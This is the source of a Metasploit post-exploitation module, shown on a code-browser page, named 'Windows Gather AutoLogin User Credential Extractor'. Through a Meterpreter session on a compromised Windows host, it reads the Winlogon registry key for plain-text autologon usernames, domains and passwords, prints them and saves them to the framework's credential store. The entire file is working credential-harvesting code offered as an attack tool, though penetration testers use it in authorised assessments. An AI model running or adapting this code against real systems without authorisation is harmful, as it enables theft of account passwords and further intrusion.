modules/post/windows/gather/credentials/windows_autologin.rb from rapid7/metasploit-framework

modules/post/windows/gather/credentials/windows_autologin.rb
Summary

Maintainability

4 hrs
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather AutoLogin User Credential Extractor',
        'Description' => %q{
          This module extracts the plain-text Windows user login password in Registry.
          It exploits a Windows feature that Windows (2000 to 2008 R2) allows a
          user or third-party Windows Utility tools to configure User AutoLogin via
          plain-text password insertion in (Alt)DefaultPassword field in the registry
          location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable
          by all users.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Myo Soe' # YGN Ethical Hacker Group, http://yehg.net
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'References' => [
          [ 'URL', 'http://support.microsoft.com/kb/315231' ],
          [ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ]
        ]
      )
    )
  end

  def run
    host_name = sysinfo['Computer']
    print_status("Running against #{host_name} on session #{datastore['SESSION']}")

    creds = []

    has_al = 0

    logon_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\'
    al = registry_getvaldata(logon_key, 'AutoAdminLogon') || ''

    do1 = registry_getvaldata(logon_key, 'DefaultDomainName') || ''
    du1 = registry_getvaldata(logon_key, 'DefaultUserName') || ''
    dp1 = registry_getvaldata(logon_key, 'DefaultPassword') || ''

    do2 = registry_getvaldata(logon_key, 'AltDefaultDomainName') || ''
    du2 = registry_getvaldata(logon_key, 'AltDefaultUserName') || ''
    dp2 = registry_getvaldata(logon_key, 'AltDefaultPassword') || ''

    if do1 != '' && du1 != '' && (dp1 != '' || (dp1 == '' && al == '1'))
      has_al = 1
      creds << [du1, dp1, do1]
      print_good("AutoAdminLogon=#{al}, DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}")
    end

    if do2 != '' && du2 != '' && (dp2 != '' || (dp2 == '' && al == '1'))
      has_al = 1
      creds << [du2, dp2, do2]
      print_good("AutoAdminLogon=#{al}, AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}")
    end

    if has_al == 0
      print_status("The Host #{host_name} is not configured to have AutoLogon password")
      return
    end

    creds.each do |cred|
      create_credential(
        workspace_id: myworkspace_id,
        origin_type: :session,
        session_id: session_db_id,
        post_reference_name: refname,
        username: cred[0],
        private_data: cred[1],
        private_type: :password,
        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
        realm_value: cred[2]
      )
    end
  end
end